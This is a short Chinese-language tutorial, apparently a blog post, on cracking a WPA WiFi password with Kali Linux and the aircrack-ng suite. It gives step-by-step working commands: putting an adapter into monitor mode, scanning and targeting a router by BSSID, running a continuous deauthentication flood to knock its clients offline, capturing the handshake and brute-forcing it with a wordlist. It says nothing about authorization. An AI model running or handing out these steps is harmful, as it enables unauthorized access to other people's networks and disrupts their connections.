kali linux安全渗透

网卡:rtl8187

工具aircrack-ng

操作+

查看无线网卡信息

ifconfig 或者 iwconfig

有个是wlan0的就是您的外置无线网卡

启动网卡监听模式

airmon-ng start wlan0

监听成功后会网卡名字将变成wlan0mon

扫描附近wifi

airodump-ng wlan0mon

参数详解:

BSSID: MAC地址

PWR:信号强度，越小信号越强。

#Data:传输的数据, 数据越大对我们越有利, 大的夸张的可能在看电影

CH:信号频道

ESSID:wifi名称

抓包开始

(比如我要抓的是这个)

然后输入命令:

airodump-ng -c 11 --bssid 2E:E9:D3:28:59:EB -w /home/chenglee/2018/ wlan0mon

解析:

-c代表频道, 后面带的是频道

bssid: mac地址(物理地址)

-w代表目录(抓到的握手包放在这个目录下面)

wlan0mon: 网卡名称

一直跑吖跑, 它的数据是不停刷新变化的...

这时候应该做点什么了,利用deauth洪水攻击，取消目标路由和所有设备的无线连接，这时候设备重新连接时，会抓取他的握手包，然后用字典进行爆破.

新开一个窗口观察

aireplay-ng -0 0 -a 2E:E9:D3:28:59:EB  wlan0mon

这时候目标路由已经断网，如果抓到包记得ctrl+c关掉这里，否则一直断网就成恶作剧了。这时返回你抓包的那个窗口，如果右上角出现handshake这样的信息(看下图)，这说明抓包已经成功。

可以进去目录看一下

破解

aircrack-ng -w /home/chenglee/dictionary/wpa.txt /home/chenglee/2018/-01.cap 

解析:

-w后面接的是字典

-01.cap是握手包

也许过程会有点长, 这个得看密码复杂的与字典的好坏。

成功

验证：wifi连接成功